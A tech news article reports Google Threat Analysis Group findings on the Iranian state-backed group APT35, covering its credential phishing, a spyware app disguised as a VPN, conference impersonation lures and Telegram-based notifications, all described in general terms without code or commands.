Iranian hacking group continues to target US citizens

APT35 used phishing attacks and uploaded spyware onto Google Play Store

An Iranian hacking group has been targeting US citizens and organizations since 2017 and doesn’t seem to be letting up, according to a new Google report.

Google's Threat Analysis Group said a state-backed Iranian group known as APT35 targeted high-value individuals in the US and elsewhere. The hackers, also known as Charming Kitten, Phosphorus, Ajax Security, and NewsBeef, have attacked high-value accounts in government, academia, journalism, NGOs, foreign policy, and national security since 2017. 

APT35 is also one of the groups that tried to disrupt the 2020 US election cycle by targeting campaign staffers. 

The group has hijacked accounts, deployed malware, and used novel techniques to conduct espionage aligned with the interests of the Iranian government, according to Google TAG team member Ajax Bash.

Earlier this year, the hackers compromised a website affiliated with a UK university to host a phishing kit.

“Attackers sent email messages with links to this website to harvest credentials for platforms such as Gmail, Hotmail, and Yahoo. Users were instructed to activate an invitation to a (fake) webinar by logging in. The phishing kit will also ask for second-factor authentication codes sent to devices,” said Bash.

Bash added that credential phishing through a compromised website demonstrates these attackers will go to great lengths to appear legitimate – “as they know it's difficult for users to detect this kind of attack”.

In May 2020, the team discovered that APT35 attempted to upload spyware to the Google Play Store. The app disguised itself as VPN software, but it could steal sensitive information such as call logs, text messages, contacts, and location data from devices if installed.

“Google detected the app quickly and removed it from the Play Store before any users had a chance to install it. Although Play Store users were protected, we are highlighting the app here as TAG has seen APT35 attempt to distribute this spyware on other platforms as recently as July 2021,” said Bash.

Among the most notable attacks by the Iranian hackers was the impersonation of conference officials to conduct phishing attacks. “Attackers used the Munich Security and the Think-20 (T20) Italy conferences as lures in non-malicious first contact email messages to get users to respond. When they did, attackers sent them phishing links in follow-on correspondence,” said Bash.

Related Resource

HP Wolf Security: Threat insights report

Equipping security teams with the knowledge to combat emerging threats

Skyscrapers from belowFree download

The hackers also used Telegram for operator notifications. The attackers embed JavaScript into phishing pages that notify them when the page has been loaded. They use the Telegram API sendMessage function to send the notification, which lets anyone use a Telegram bot to send a message to a public channel.

“The attackers use this function to relay device-based data to the channel, so they can see details such as the IP, useragent, and locales of visitors to their phishing sites in real-time. We reported the bot to Telegram, and they have taken action to remove it,” said Bash.

This year, Google has warned over 50,000 account holders they may have been targeted by state-backed attempts to hack them using phishing or malware, a nearly 33% increase from this time in 2020. 

Featured Resources

2021 Thales cloud security study

The challenges of cloud data protection and access management in a hybrid and multi cloud world

Free download

IDC agility assessment

The competitive advantage in adaptability

Free Download

Digital transformation insights from CIOs for CIOs

Transformation pilotes, co-pilots, and engineers

Free download

What ITDMs did next - and what they should be doing now

Enable continued collaboration and communication for hybrid workers

Recommended

Gmail vs Outlook.com: Which one is better?
email providers

Gmail vs Outlook.com: Which one is better?

26 Nov 2021
Compromised Google Cloud Platform instances are riddled with cryptominers
cloud computing

Compromised Google Cloud Platform instances are riddled with cryptominers

26 Nov 2021
Hackers use Linux backdoor on compromised e-commerce sites with software skimmer
malware

Hackers use Linux backdoor on compromised e-commerce sites with software skimmer

19 Nov 2021
Iranian hackers ramp up attacks against IT services sector
hacking

Iranian hackers ramp up attacks against IT services sector

19 Nov 2021

Most Popular

What should you really be asking about your remote access software?
Sponsored

What should you really be asking about your remote access software?

17 Nov 2021
How to move Microsoft's Windows 11 from a hard drive to an SSD
Microsoft Windows

How to move Microsoft's Windows 11 from a hard drive to an SSD

24 Nov 2021
Nike to take customers into the metaverse with 'NIKELAND'
virtualisation

Nike to take customers into the metaverse with 'NIKELAND'

19 Nov 2021